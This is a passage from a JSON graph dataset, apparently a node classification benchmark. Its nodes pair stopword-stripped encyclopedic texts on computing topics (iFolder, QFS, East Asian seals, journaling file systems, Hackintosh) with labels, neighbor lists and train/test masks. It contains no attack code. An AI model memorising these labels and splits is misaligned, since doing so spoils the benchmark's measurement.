      4410,
      2620,
      191,
      10819,
      6596,
      1349,
      8262,
      9668,
      9926,
      585,
      4042,
      10703,
      11343,
      5845,
      7421,
      602,
      219,
      477,
      7135,
      7395,
      4838,
      6503,
      8296,
      8680,
      1386,
      10983,
      5358,
      5234,
      499,
      372,
      9330,
      1915,
      2556,
      2045,
      2943
    ],
    "mask": "Test"
  },
  {
    "node_id": 9332,
    "label": 4,
    "text": "IFolder:ifolder ifolder open-source application developed novell inc. intended allow cross-platform file sharing across computer networks ifolder operates concept shared folders folder marked shared contents folder synchronized computers network either directly computers peer-to-peer fashion server intended allow single user synchronize files different computers example work computer home computer share files users example group people collaborating project core ifolder actually project called simias simias actually monitors files changes synchronizes changes controls access permissions folders actual ifolder clients including graphical desktop client web client developed separate programs communicate simias back-end originally conceived developed pgsoft company taken novell 2000 ifolder announced novell march 19 2001 released june 29 2001 software package windows nt/2000 novell netware 5.1 included forthcoming novell netware 6.0 also included ability access shared files web browser ifolder professional edition 2 announced march 13 2002 released month later added support linux solaris web access support windows ce palm os edition also designed share files millions users large companies increased reporting features administrators 2003 ifolder codie award march 22 2004 purchase linux software companies ximian suse novell announced releasing ifolder open source project gpl license also announced open source version ifolder would use mono framework effort ease development ifolder 3.0 released june 22 2005 march 31 2006 novell announced ifolder enterprise server open source april 2 2009 novell released ifolder 3.7.2 included mac client 10.4 10.5 well windows vista client addition improved client lineup version supports ssl ldapgroup support auto-account creation ifolder merge enhanced web access administration ifolder.com website completely redesigned references earlier versions nov 25 2009 novell released ifolder 3.8",
    "neighbors": [
      4229,
      4490,
      6797,
      8976,
      11029,
      10522,
      546,
      3366,
      7983,
      823,
      3770,
      8640,
      321,
      3791,
      3792,
      728,
      3676,
      5085,
      3428,
      3813,
      5612,
      7921,
      9329,
      5749
    ],
    "mask": "Test"
  },
  {
    "node_id": 9333,
    "label": 6,
    "text": "QFS:qfs qfs quick file system filesystem oracle tightly integrated sam storage archive manager hence often referred sam-qfs sam provides functionality hierarchical storage manager qfs supports volume management capabilities allowing many disks grouped together file system file system metadata kept separate set disks useful streaming applications long disk seeks tolerated sam extends qfs file system transparently archival storage sam-qfs file system may relatively small gigabytes terabytes disk cache backed petabytes tape bulk storage files copied archival storage background transparently retrieved disk accessed sam-qfs supports four archival copies disk tape optical media may stored remote site also running sam-qfs shared qfs adds multi-writer global filesystem allowing multiple machines read write disks concurrently use multi-ported disks storage area network qfs also single-writer/multi-reader mode used share disks hosts without need network connection sam-qfs originally developed lsc inc purchased sun 2001 sun released sam-qfs source code opensolaris project march 2008 sun acquisition oracle continues develop sam-qfs product later oracle renamed sam-qfs oracle hsm oracle hierarchical storage manager",
    "neighbors": [
      5120,
      9731,
      2564,
      6669,
      3598,
      10257,
      9236,
      6677,
      5142,
      8214,
      3611,
      9249,
      9762,
      10789,
      5158,
      5677,
      7225,
      11323,
      8772,
      597,
      1109,
      10327,
      10851,
      4708,
      11363,
      9836,
      7789,
      5233,
      631,
      6263,
      9335,
      9343,
      7818,
      4235,
      654,
      2193,
      2194,
      2197,
      2710,
      2199,
      11419,
      6309,
      1190,
      5286,
      10405,
      1707,
      5293,
      3247,
      7344,
      6322,
      2230,
      5816,
      1212,
      8380,
      3265,
      6338,
      10436,
      10951,
      9420,
      7378,
      3795,
      4819,
      3285,
      8402,
      8404,
      728,
      8410,
      6365,
      739,
      7907,
      9955,
      8938,
      1263,
      3312,
      5872,
      3826,
      2291,
      246,
      3834,
      3328,
      11012,
      1801,
      2314,
      8461,
      6416,
      1809,
      1810,
      6935,
      11033,
      287,
      1825,
      6434,
      8994,
      1316,
      5413,
      3368,
      4907,
      9004,
      302,
      7983,
      6961,
      6963,
      1844,
      823,
      2871,
      6970,
      11072,
      3909,
      8007,
      2378,
      2895,
      4431,
      5969,
      346,
      2395,
      2397,
      5471,
      4960,
      10596,
      2407,
      10087,
      11626,
      7022,
      11638,
      1399,
      376,
      6519,
      890,
      11128,
      11129,
      7554,
      8075,
      7565,
      6545,
      5013,
      11675,
      11676,
      414,
      2974,
      7070,
      7072,
      10151,
      4012,
      1454,
      6062,
      11184,
      8114,
      7603,
      8631,
      1464,
      1978,
      7104,
      9665,
      8643,
      1480,
      7126,
      10200,
      2015,
      1509,
      9189,
      7148,
      7663,
      8179,
      11256,
      2555,
      3582
    ],
    "mask": "None"
  },
  {
    "node_id": 9334,
    "label": 4,
    "text": "Seal_(East_Asia):seal east asia seal east southeast asian context general name printing stamps impressions thereof used lieu signatures personal documents office paperwork contracts art item requiring acknowledgement authorship process started china soon spread across east asia china japan korea currently use mixture seals hand signatures increasingly electronic signatures chinese seals typically made stone sometimes metals wood bamboo plastic ivory typically used red ink cinnabar paste word 印 yìn mandarin japanese korean pronounced specifically refers imprint created seal well appearing combination ideographs words related printing word 印刷 printing pronounced yìnshuā mandarin insatsu japanese colloquial name chop referring kinds seals adapted hindi word chapa malay word cap meaning stamp rubber stamps japan seals hanko historically used identify individuals involved government trading ancient times japanese emperors shōguns samurai personal seal pressed onto edicts public documents show authenticity authority even today japanese citizens companies regularly use name seals signing contract important paperwork chinese emperors families officials used large seals known xǐ later renamed bǎo corresponds great seals western countries usually made jade although hard wood precious metal could also used originally square shape changed rectangular form song dynasty reverted square qing dynasty important seals heirloom seal realm created first emperor china qin shi huang seen legitimising device embodying symbolising mandate heaven heirloom seal passed several dynasties lost beginning ming dynasty partly explains qing emperors obsession creating numerous imperial seals emperors official use alone forbidden city beijing collection 25 seals order reduce significance heirloom seal seals typically bore titles offices rather names owners different seals could used different purposes example qianlong emperor number informal appreciation seals used select paintings collection popular style script government seals imperial eras china song dynasty qing dynasty nine-fold script highly stylised script unreadable untrained government republic china taiwan continued use traditional square seals 13 centimetres side known variety names depending user hierarchy part inaugural ceremony president republic china includes bestowing seal republic china seal honor people republic china seal central people government 1949 1954 square bronze seal side lengths 9 centimetres inscription reads seal central people government people republic china notably seal uses relatively modern song typeface rather ancient seal scripts seal called yìn xǐ nod modernity government seals people republic china today usually circular shape five-pointed star centre circle name governmental institution arranged around star semicircle many classes personal seals denotes person name equivalent today email signature contain person personal philosophy literary inclination shape ranging ovals dragon-shaped carry name person private studio 書齋 literati ancient china although probably lesser forms less rectangular shape two types seal paste depending base material made standard colour vermilion red lighter darker shades red colours used black navy etc specific purposes plant-based paste tends dry quickly silk-based pastes plant extract hold onto oil tightly silk depending paper used plant pastes dry 10 15 minutes absorbent paper faster dries paper absorbs oil also plant pastes tend smudge easily silk pastes due loose binding agent paste kept covered used original container plastic ceramic kept environment away direct sunlight away intense heat prevent drying paste silk based pastes need stirred spatula every month avoid oil sinking drying paste well prepare use good paste would produce clear impression one go impression clear requiring impressions indicates paste either dry cinnabar depleted seal pressed onto printing surface procedure differs according plant silk based paste silk based paste user applies pressure often specially made soft flat surface beneath paper plant based paste user simply applies light pressure lifting seal vertically away imprint may rip damage paper seal usually lifted one side time bent page image may blotted piece paper make dry faster although may smudge usually needs pile soft felt paper paper imprinted clear seal impression many people china possess personal name seal artists scholars collectors intellectuals may possess full set name seals leisure seals studio seals well-made seal made semi-precious stones cost 400 4000 yuan seals still used official purposes number contexts collecting parcels registered post name seal serves identification akin signature banks traditionally method identification also seal seals remain customary form identification cheques mainland china taiwan hong kong signatures required today personal identification often hand signature accompanied seal imprint seals serve identification signatures difficult forge compared forging signature owner access seal seals also often used chinese calligraphy works chinese paintings usually imprinted works order top bottom name seal leisure seal studio seal owners collectors paintings books often add studio seals pieces collected practice act appreciation towards work artworks seals inscriptions owner example qianlong emperor many 20 different seals use inscriptions paintings collected provided tastefully done example obscuring body painting appropriate inscription fine calligraphy etc practice devalue painting could possibly enhance giving provenance especially seal famous celebrated individual possessed work point seals usually carved specialist seal carvers users specialist carvers carve user name stone one standard scripts styles described usually fee hand people take carving seals using soapstone fine knives widely available cheaper paying professional expertise craft material results vary possible individuals carve perfectly legitimate seals novelty souvenir seal carvers also ply tourist business chinatowns tourist destinations china often carve on-the-spot translations foreign names inexpensive soapstone sometimes featuring roman characters though seals functional typically nothing curios may inappropriate serious use could actually devalue deface serious works art determining side seal face may done number ways carving top front face user inscription side face left user dot side face away user seals used much paste possible wiped printing surface edges suitable material seals kept constant environment especially seals made sandalwood black ox horn tall thin seals best kept sides case wobble fall important seals authority society seals encased wrapped golden silk cloth add protection japan seals general referred inkan comprehensive term hanko tends refer seals used less important documents first evidence writing japan hanko dating ad 57 made solid gold given ruler nakoku emperor guangwu han called king na gold seal first emperor trusted vassals held hanko symbol emperor authority noble people began using personal hanko 750 samurai began using sometime feudal period samurai permitted exclusive use red ink modernization began 1870 hanko came general use throughout japanese society government offices corporations usually inkan specific bureau company follow general rules outlined jitsuin following exceptions size comparatively large measuring across handles often extremely ornately carved friezes mythical beasts hand-carved hakubun inscriptions might quotes literature names dates original poetry privy seal japan example weighing 3.55 kg measuring 9.09 cm size used official purposes emperor seals carved square tunnels handle underside specific person slide inkan hollow thus signing document name business bureau name seals usually stored jitsuin -style boxes high security except official ceremonies displayed extremely ornate stands boxes personal use least four kinds seals order formal/official least jitsuin ginkō-in mitome-in gagō-in officially registered seal registered seal needed conduct business important legally binding events jitsuin used purchasing vehicle marrying purchasing land size shape material decoration lettering style jitsuin closely regulated law example hiroshima jitsuin expected roughly usually square rarely rectangular never round irregular oval must contain individual full family given name without abbreviation lettering must red white background shubun roughly equal width lines used throughout name font must one several based ancient historical lettering styles found metal woodcarving ancient forms ideographs commonplace red perimeter must entirely surround name decoration underside working surface seal top sides handle seal may decorated fashion completely undecorated historical animal motifs dates names inscriptions throughout japan rules governing jitsuin design stringent design unique vast majority people entrust creation jitsuin professional paying upward us 20 often closer us 100 using decades people desirous opening new chapter lives—say following divorce death spouse long streak bad luck change career—will often new jitsuin made material usually high quality hard stone far less frequently deerhorn soapstone jade sometimes carved machine carved hand intō seal-engraving blade mirror small specialized wooden vice used intō flat-bladed pencil-sized chisel usually round octagonal cross-section sometimes wrapped string give handle non-slip surface intō held vertically one hand point projecting one fist side opposite one thumb new modern intō range price less us 1 us 100 jitsuin kept secure place bank vault hidden carefully one home 're usually stored thumb-sized rectangular boxes made cardboard covered heavily embroidered green fabric outside red silk red velvet inside held closed white plastic deerhorn splinter tied lid passed fabric loop attached lower half box superficial resemblance coffins 're often called coffins japanese enthusiasts hanko boutiques paste usually stored separately used specifically banking ginkō means bank person savings account passbook contains original impression ginkō-in alongside bank employee seal rules size design vary somewhat bank bank generally contain japanese person full name westerner may permitted use full family name without abbreviated given name smith bill smith w smith wm smith place william smith lettering red white font artistic decoration people custom-made professionals make hand since mass-produced ginkō-in offer security wood stone carried variety thumb-shape -size cases resembling cloth purses plastic pencil cases usually hidden carefully owner home banks always provide stamp pads ink paste addition dry cleaning tissues banks also provide small plastic scrubbing surfaces similar small patches red artificial grass attached counters used scrub accumulated ink paste working surface customers seals moderately formal seal typically used signing postal deliveries signing utility bill payments signing internal company memos confirming receipt internal company mail low-security everyday functions mitome-in commonly stored low-security high-utility places office desk drawers anteroom genkan residence mitome-in form governed far fewer customs jitsuin ginkō-in however mitome-in adhere handful strongly observed customs size attribute strongly governed social custom usually size american penny smaller male usually slightly larger female junior employee always smaller bosses senior co-workers keeping office social hierarchy mitome-in always person family name usually person given name shita namae often round oval square ones uncommon rectangular ones unheard-of always geometric figures red lettering blank field shubun opposite hakubun borderlines around edges optional plastic mitome-in popular japanese names obtained stationery stores less us 1 though ones made inexpensive stone also popular inexpensive prefabricated seals called prefabricated rubber stamps unacceptable business purposes mitome-in lesser seals usually stored inexpensive plastic cases sometimes small supplies red paste stamp pad included japanese also far less formal seal used sign personal letters initial changes documents referred broadly generic term hanko often display single hiragana kanji ideograph katakana character carved often round oval square vary size women tend small traditionally inkan hanko engraved end finger-length stick stone wood bone ivory diameter carving form calligraphic art foreign names may carved rōmaji katakana hiragana kanji inkan standard japanese names may purchased prefabricated almost every stationery store discount store large book store department store carries small do-it-yourself kits making hanko include instructions hiragana fonts written forward mirror-writing 'd appear working surface seal slim tou chisel two three grades sandpaper slim marker pen draw design stone one three mottled inexpensive soft square green finger-size stones modern japan people several inkan certificate authenticity required hanko used significant business transaction registration certification inkan may obtained local municipal office e.g. city hall person receives certificate seal impression known increasing ease modern technology allows hanko fraud beginning cause concern present system able survive signatures used transactions cases signing cell phone contract may used sometimes addition stamp mitome-in transactions jitsuin official mitome-in alone insufficient thus signatures used chinese style seals also utilized ryūkyū kingdom seal first introduced korea approximately 2nd century bc remaining oldest record usage korea kings buyeo used royal seal oksae 옥새 玉璽 bore inscription seal king ye 濊王之印 예왕지인 use seals became popular three kingdoms korea period case state seals monarchic korea two types use gugin 국인 國印 conferred emperor china korean kings intent keeping relations two countries brothers sadae used communications china coronation kings others generally called eobo 어보 御寶 eosae 어새 御璽 used foreign communications countries china domestic uses declaration establishment republic korea 1948 government created new state seal guksae 국새 國璽 used promulgation constitution designation cabinet members ambassadors conference national orders important diplomatic documents seals also used government officials documents types seals called gwanin 관인 官印 supervised specialist officials modern korea use seals still common koreans personal seals every government agency commercial corporation seals use public documents signing also accepted many koreans think formal use seals public documents 2008 constitutional court south-korea upheld supreme court judgement signed handwritten lacked registered seal invalid personal seals korea classified legal status ingam 인감 印鑑 sirin 실인 實印 meaning registered seal seal registered local office registering seal person issue certificate seal registration required document significant business transactions civil services legal system registered seals introduced japanese colonial government 1914 scheduled completely replaced electronic certification system 2013 order counter fraud ingam still remains official means verification binding legal agreement identification government pass 'act confirmation etc personal signature 본인서명사실 확인 등에 관한 법률 2012 allows pre-registered handwritten signatures legal effect ingam ingam used important business dojangs used everyday purpose less-significant official transactions thus koreans two seals traditional arts like china japan artist chinese calligraphy paintings would use seals generally leisure seals studio seals identify his/her work types seals called nakkwan 낙관 落款 seal-carving considered form art many artists carved seals seals joseon-period calligraphist natural historian kim jung-hee aka wandang chusa considered antiquity korean seals made wood jade sometimes ivory value state seals generally made gold high-quality jade rare cases bronze steel seals exist philippines also sealing culture prior spanish colonization however spaniards succeeded colonizing islands abolished practice burned documents captured natives forcefully establishing roman catholic-based rule records philippine seals forgotten 1970 actual ancient seals made ivory found archaeological site butuan seal known butuan ivory seal declared national cultural treasure seal inscribed word butwan native suyat script discovery seal proved theory pre-colonial filipinos least coastal areas used seals paper discovery seal thought ancient filipinos used bamboo metal bark leaves writing presence paper documents classical era philippines also backed research dr. h. otley beyer father philippine anthropology stating spanish friars 'boasted burning ancient philippine documents suyat inscriptions one reasons ancient documents philippines almost non-existent present time ivory seal housed national museum philippines nowadays younger generations trying revive usage seals notably signing pieces art drawings paintings calligraphy literary works seal used lesser extent vietnam authorised organisations businesses also traditional vietnamese artists common vietnam prior french rule thereafter practice signature became commonality although western-like signatures usually seen less authority corporate situation chinese style seals typically used china japan korea occasionally used outside east asia example rulers ilkhanate mongol khanate established hulagu khan persia used seals containing chinese characters diplomatic letters letter arghun french king philip iv letter ghazan pope boniface viii seals sent emperors yuan dynasty ruling dynasty china mongolia especially kublai khan successor emperor chengzong",
    "neighbors": [
      1496,
      5740,
      1821,
      9576
    ],
    "mask": "None"
  },
  {
    "node_id": 9335,
    "label": 6,
    "text": "Journaling_file_system:journaling file system journaling file system file system keeps track changes yet committed file system main part recording intentions changes data structure known journal usually circular log event system crash power failure file systems brought back online quickly lower likelihood becoming corrupted depending actual implementation journaling file system may keep track stored metadata resulting improved performance expense increased possibility data corruption alternatively journaling file system may track stored data related metadata implementations allow selectable behavior regard 1990 ibm jfs introduced aix 3.1 one first unix commercial filesystems implemented journaling later 1993 microsoft ntfs filesystem 2001 ext3 implemented journaling updating file systems reflect changes files directories usually requires many separate write operations makes possible interruption like power failure system crash writes leave data structures invalid intermediate state example deleting file unix file system involves three steps crash occurs step 1 step 2 orphaned inode hence storage leak crash occurs steps 2 3 blocks previously used file used new files effectively decreasing storage capacity file system re-arranging steps help either step 3 preceded step 1 crash could allow file blocks reused new file meaning partially deleted file would contain part contents another file modifications either file would show hand step 2 preceded step 1 crash would cause file inaccessible despite appearing exist detecting recovering inconsistencies normally requires complete walk data structures example tool fsck file system checker must typically done file system next mounted read-write access file system large relatively little i/o bandwidth take long time result longer downtimes blocks rest system coming back online prevent journaled file system allocates special area—the journal—in records changes make ahead time crash recovery simply involves reading journal file system replaying changes journal file system consistent changes thus said atomic divisible either succeed succeeded originally replayed completely recovery replayed skipped yet completely written journal crash occurred file systems allow journal grow shrink re-allocated regular file others put journal contiguous area hidden file guaranteed move change size file system mounted file systems may also allow external journals separate device solid-state drive battery-backed non-volatile ram changes journal may journaled additional redundancy journal may distributed across multiple physical volumes protect device failure internal format journal must guard crashes journal written many journal implementations jbd2 layer ext4 bracket every change logged checksum understanding crash would leave partially written change missing mismatched checksum simply ignored replaying journal next remount physical journal logs advance copy every block later written main file system crash main file system written write simply replayed completion file system next mounted crash write logged journal partial write missing mismatched checksum ignored next mount physical journals impose significant performance penalty every changed block must committed twice storage may acceptable absolute fault protection required logical journal stores changes file metadata journal trades fault tolerance substantially better write performance file system logical journal still recovers quickly crash may allow unjournaled file data journaled metadata fall sync causing data corruption example appending file may involve three separate writes metadata-only journal step 3 would logged step 3 done steps 1 2 replayed recovery file appended garbage write cache operating systems sorts writes using elevator algorithm similar scheme maximize throughput avoid out-of-order write hazard metadata-only journal writes file data must sorted committed storage associated metadata tricky implement requires coordination within operating system kernel file system driver write cache out-of-order write hazard also occur device write blocks immediately underlying storage flush write-cache disk due deferred write enabled complicate matters many mass storage devices write caches may aggressively reorder writes better performance particularly common magnetic hard drives large seek latencies minimized elevator sorting journaling file systems conservatively assume write-reordering always takes place sacrifice performance correctness forcing device flush cache certain points journal called barriers ext3 ext4 ufs implementations avoid journaling instead implement soft updates order writes way on-disk file system never inconsistent inconsistency created event crash storage leak recover leaks free space map reconciled full walk file system next mount garbage collection usually done background log-structured file systems write-twice penalty apply journal file system occupies entire storage device structured traversed would normal file system full copy-on-write file systems zfs btrfs avoid in-place changes file data writing data newly allocated blocks followed updated metadata would point new data disown old followed metadata pointing superblock root file system hierarchy correctness-preserving properties journal without write-twice overhead",
    "neighbors": [
      2560,
      5120,
      2564,
      6155,
      6669,
      3598,
      10257,
      6675,
      7187,
      6677,
      5142,
      8214,
      3096,
      25,
      1049,
      3611,
      5658,
      4637,
      10776,
      9249,
      9762,
      4643,
      6180,
      5158,
      8233,
      7217,
      10803,
      9784,
      7225,
      10809,
      11323,
      576,
      2625,
      3648,
      8772,
      8266,
      6221,
      5714,
      1109,
      6743,
      3160,
      10333,
      97,
      10851,
      4708,
      11363,
      6760,
      10856,
      8298,
      9835,
      3692,
      7789,
      9836,
      7285,
      9333,
      4727,
      2168,
      6263,
      634,
      1147,
      3197,
      1150,
      5247,
      9343,
      11390,
      2179,
      10883,
      5115,
      5256,
      7818,
      10891,
      652,
      6797,
      654,
      10382,
      2193,
      2194,
      2197,
      9366,
      2199,
      6296,
      2201,
      9370,
      9882,
      11419,
      7325,
      9887,
      6309,
      1190,
      5286,
      10405,
      7339,
      5293,
      8879,
      3248,
      7344,
      178,
      8369,
      9907,
      6837,
      2230,
      5816,
      6329,
      8889,
      1212,
      8380,
      5823,
      3265,
      4804,
      8388,
      10951,
      1736,
      2248,
      2250,
      9420,
      9932,
      5840,
      7378,
      3795,
      4819,
      8402,
      7382,
      8404,
      728,
      8410,
      9436,
      6365,
      1247,
      11489,
      739,
      7907,
      1253,
      8938,
      7403,
      1263,
      3312,
      242,
      2291,
      3826,
      5363,
      246,
      3834,
      2811,
      9466,
      9468,
      1278,
      2304,
      3328,
      10499,
      11012,
      2314,
      1804,
      8461,
      6416,
      273,
      1810,
      787,
      8977,
      789,
      5397,
      6935,
      11539,
      11033,
      287,
      10016,
      1825,
      6434,
      292,
      5413,
      3366,
      10235,
      3368,
      2345,
      4907,
      9004,
      302,
      7983,
      6961,
      2355,
      1844,
      6963,
      7477,
      823,
      4409,
      6970,
      6459,
      7483,
      7999,
      10048,
      5953,
      11072,
      11075,
      3909,
      4423,
      2378,
      5452,
      6988,
      4431,
      5457,
      5969,
      7507,
      11601,
      2901,
      7511,
      346,
      2395,
      2397,
      6494,
      10590,
      3426,
      5474,
      10596,
      2407,
      8551,
      10087,
      5484,
      7020,
      11635,
      5492,
      2421,
      2933,
      6519,
      376,
      11128,
      890,
      11638,
      8573,
      7039,
      8063,
      10113,
      7554,
      8069,
      9236,
      3975,
      394,
      3978,
      4492,
      7565,
      8075,
      6545,
      7057,
      11667,
      5013,
      4506,
      11675,
      6044,
      8092,
      414,
      2462,
      2974,
      3487,
      5022,
      7070,
      11676,
      421,
      1445,
      935,
      10151,
      4521,
      9643,
      4012,
      4525,
      1454,
      6062,
      11184,
      7601,
      8114,
      7603,
      10676,
      8631,
      1464,
      1978,
      6075,
      6078,
      9151,
      8643,
      11204,
      11205,
      4040,
      8136,
      9166,
      7126,
      2015,
      7136,
      1509,
      5093,
      9189,
      10730,
      10731,
      7663,
      6128,
      5105,
      5106,
      5619,
      8687,
      11256,
      2555,
      3582
    ],
    "mask": "Train"
  },
  {
    "node_id": 9336,
    "label": 4,
    "text": "Authentication_server:authentication server authentication server provides network service applications use authenticate credentials usually account names passwords users client submits valid set credentials receives cryptographic ticket subsequently use access various services authentication used basis authorization determination whether privilege may granted particular user process privacy keeps information becoming known non-participants non-repudiation inability deny done something authorized done based authentication major authentication algorithms include passwords kerberos public key encryption",
    "neighbors": [
      8674,
      7075,
      4423,
      7368,
      10058,
      11244,
      10863,
      6098,
      5433,
      7804,
      1054
    ],
    "mask": "Test"
  },
  {
    "node_id": 9337,
    "label": 2,
    "text": "Hackintosh:hackintosh hackintosh portmanteau hack macintosh computer runs macos device authorized apple one longer receives official software updates hackintoshing began result apple 2005 transition intel processors away powerpc since 2005 mac computers use x86-64 computer architecture computer manufacturers maintaining binary-code compatibility hackintosh laptops sometimes referred hackbooks .. apple software license macos permits software use computers apple-branded however modern macintosh computers use intel-based hardware limitations keeping software running types intel-based pcs notably companies psystar attempted release products using macos non-apple machines though many hackintosh systems designed solely macos enthusiasts various hacking forums communities methods apple uses prevent macos installed non-apple hardware protected commercial circumvention united states digital millennium copyright act dmca specific changes law regarding concept jailbreaking placed circumvention methods like legal grey area june 6 2005 apple announced plans switch intel processors worldwide developers conference released developer transition kit selected developers cost 999 efforts immediately began attempt run mac os x non-apple hardware developers quickly found error message saying pc hardware configurations supported january 10 2006 apple released 10.4.4 first generation intel-based macs imac macbook pro machines used extensible firmware interface efi platform firmware instead older style bios found x86 motherboards time february 14 2006 initial hack v10.4.4 released internet programmer pseudonym crg92 within hours apple released 10.4.5 update patched author within two weeks april 3 2006 apple released 10.4.6 update patches released within two weeks allowed users install update non-apple computers although include updated kernel 10.4.6 june hackers released 10.4.7 update non-apple computers using 10.4.4 kernel release 10.4.8 update osx86 patches used 10.4.4 kernel rest operating system version 10.4.8 however newer frameworks relied newer kernels led users 10.4.8 encountering many problems apple also started making use sse3 instructions hardware making even difficult users cpus supporting sse2 older pentium 4s get fully compatible system running solve problem hackers community released kernels instructions emulated sse2 equivalents although produced performance penalty throughout years many distros released download internet distros copies mac os x installer disc modified include additional components necessary make os run non-apple hardware prominent member community jas released many distros mac os x tiger containing patched kernels popular distros iatkos kalyway ipc ideneb niresh distros fallen favour osx86 community grew new bootloaders developed made possible use actual copies os x installer early v10.5 build 9a466 community maintained version leopard run non-apple hardware hacker handle brazilmac created one earliest patching processes made convenient users install onto 3rd party hardware using legally obtained retail version apple simplification made brazilmac patch later revisions quickly popular choice many distros five popular builds go name jas kalyway iatkos ipc ideneb although recently builds way boot-132 method described gains popularity however compilations rely work kernel hackers made lorem build 9a466 synthetix builds 9a499 9a527 9a559 toh builds 9a581 9b13 9b18 recently group calling stagexnu called voodoo darwin 9.4.0 contributions trickled various mac osx86 installers readily available internet continue refined updated builds released maintain compatibility apple releases ever-increasing number third-party components osx86 community quick make necessary modifications enable apple latest releases run non-apple hardware within hours leopard release amd/intel sse2/3 kernel patcher created removed hpet requirement original untouched mach_kernel file core component mac os snow leopard released russian hacker netkas created version chameleon boot mac os x v10.6 main problem many people forced modify dsdt use kexts due specific issues soon possible modbin dmitrik released test versions kernel allow boot snow leopard amd machines stable xnu kernels v10.6 released qoopz pcj popular builds based retail name universal intel hazard iatkos since v10.6.2 nawcom qoopz andy vandijck working legacy kernel unsupported cpus apple released developer preview 1 russian hackintosh developer usr-sse2 first created method install lion method consists deploying mac os x v10.7 image flash drive booting via xpc uefi bootloader see duet changes made chameleon source code became possible boot lion updated version chameleon dmitrik also known bronzovka luck creating kernel supported amd systems months 10.7.3 v2 amd support iatkos l2 10.7.2 intel released shortly release developer preview 1 unknown developers managed install version os x pc using modified version chameleon bootloader version released via main project starting version r1997 general public due problems sourced lion era ways installing required patches never made public leaves scene unknown state towards mountain lion since retail release mountain lion several users reported successful setups using installers purchased mac app store along updated versions chameleon tools including distros niresh distro 10.8 intel first released updated 10.8.2 amd intel 10.8.5 uefi support amd intel support versions iatkos ml2 released niresh release multiple new kernels hackintosh 10.9 works although still minor issues kernels aim allow users run mavericks amd older intel cpus lack certain instruction sets latest intel cpus significant efforts made emulate instruction sets like ssse3 present amd k10-based cpus older intel cpus like intel core duo amd latest cpus 'bulldozer architecture onwards contain almost latest instruction sets hence kernels full sse4 support also released two months niresh distro released mavericks supports amd cpus latest intel cpus also custom kernel allows intel atom processors boot mavericks niresh free distro released mavericks since iatkos team decided release mavericks distro specific hardware donation basis initial release os x yosemite 10.10 beta various developers took role updating bootloaders system members osx86 forum insanelymac set update efi bootloader chameleon new os release time later niresh independent osx86 developer released standalone tool known yosemite zone would automatically install new os various features non-apple device minimal input method consisted torrenting os x 10.10 dmg onto usb flash drive macpwn vanilla installation unibeast updated support yosemite distribution yosemite zone released amd processor support vanilla installation yosemite possible via insanelymac pandora box beta 2.0 unibeast type installation uses kexts drivers possible addition using unaltered version os x installation app preferred distributions clover chameleon updated compatible el capitan unibeast macpwn updated support el capitan well since el capitan unibeast multibeast use clover bootloader instead chimera chameleon-based bootloader clover chameleon updated compatible sierra unibeast pandora box macpwn updated support distribution sierra zone 10.12.3 released amd processor support clover macpwn unibeast updated support distro high sierra zone hackintosh zone 10.13 released amd processor support including ryzen cpus clover updated support mojave revision 4514 unibeast also received mojave support intel-based machines apple authorize use mac os x x86 pc ones developed company used technical means although trusted platform module tpm widely mis-reported tie mac os systems distributed developers announcing switch intel chips macos eula forbids installations macos non-apple-branded computer july 3 2008 apple filed lawsuit psystar corporation violating restriction among claims apple claimed psystar violated digital millennium copyright act dmca dodging copy-protection technologies apple uses protect apple employs technological protection measures effectively control access apple copyrighted works specifically apple charged psystar acquiring creating code avoids bypasses removes descrambles decrypts deactivates impairs technological protection measure without apple authority purpose gaining unauthorized access apple copyrighted works brief revealed apple considers methods uses prevent macos installed non-apple hardware protected digital millennium copyright act dmca november 13 2009 court granted apple motion summary judgment found apple copyrights violated well dmca psystar installed apple operating system non-apple computers hearing remedies set december 14 january 14 2009 gadget lab site wired magazine posted video tutorial installing msi wind netbook removed following complaint apple textual instructions remain include eula violation disclaimer may 15 2012 case apple vs. psystar corporation finally ended court ruled psystar violated apple exclusive reproduction right distribution right right create derivative works putting end case copies mac os x tiger started running non-apple hardware found processors unable run os rosetta binary translator made possible run powerpc programs intel processors later kernel required support sse3 instruction set circumvent programmers community released patched kernels included support emulating sse3 instructions using sse2 equivalents october 2005 apple released update 10.4.3 developers required nx bit microprocessor support however patches released circumvent well patched kernels also later released supported amd processors mac os x leopard released october 26 2007 patches created remove hpet requirement kernel efforts also made emulate ssse3 instruction set processors support kernel used os x mavericks made use ssse3 instructions requiring patches extensible firmware interface efi specification defines software interface operating system platform firmware since method generally require copying modification macos considered legal way installing macos non-apple computers despite untested courts early november 2007 group hackers fronted russian hacker known netkas using already modified boot-132 source root david elliot also known dfe developed method emulating efi environment using specially modified darwin bootloader practical terms meant regular pcs meeting minimum set hardware requirements could seen real macintosh computers os allowing use unmodified stock apple kernels long cpu supports thus giving transparent reliable operation several methods real world deployment innovative solution arisen around internet explanation achievement along usage guide provided website digitmemo.com true efi emulation highly sought asset osx86 community previous efforts based upon apple open source darwin project hackintosh gurus allowed users use macos normal pcs patched kernels/kernel modules simply bypassed efi using efi patch hackintosh could boot vanilla unmodified macos kernels use vanilla kernel extensions allowed system compatible future system updates also offered increased stability method also circumvents one aspect apple end user license agreement states modification non-open source components os forbidden mid-2008 new commercial product efi-x released claims allow full simple booting official leopard install disks subsequent install without patching required possibly repackaging boot-132 technology usb-attached device rebel efi another commercial product also seems use open source software thought windows 7 support efi would result pc motherboards replacing bios efi msi announced efinity mainboard early 2008 2011 efi-based computers entered market however none natively boot mac os x due lack hfs+ driver efi implementation boot-132 bootloader provided apple loading xnu kernel mid-2008 new modified boot-132 came scene method allows users conduct leopard-based osx86 installation using stock retail-purchased copy leopard eradicates necessity hacked installation like jas kalyway mentioned previously boot-132 bootloader essentially preloads environment system leopard boot operate bootloader stores necessary files kext files .img collection simply folder luxury new installation method includes ability boot install retail leopard dvd update straight apple without breaking dmca possible problem breaks macos eula bootloader behaves like linux kernel one use mboot-compatible patched syslinux used hack bootloader tells boot-dfe .img file ramdisk initrd known linux users boot-dfe use kexts mkext new boot-dfe tested retail leopard dvd boot install run leopard without build modified dvd since early developer builds mac os x v10.6 members osx86 community booting new operating system using yet another bootloader called pc efi provided russian hacker netkas bootloader voodoo team chameleon chameleon based david elliot boot-132 bootloader supports acpi smbios graphics ethernet injections allows boot macos non-macintosh hardware chameleon supports lot amd well nvidia graphics cards lot branches different developers chameleon currently 2.1 development state fakeefi invented david elliot many years ago operates assumption efi already work leaves activity traces boot-args tables tree efiruntime routines simple form memory starts kernel mach_kernel realefi theoretically flashed instead bios alternatively loadable efi used bios motherboard system invented intel currently active open source development tianocore 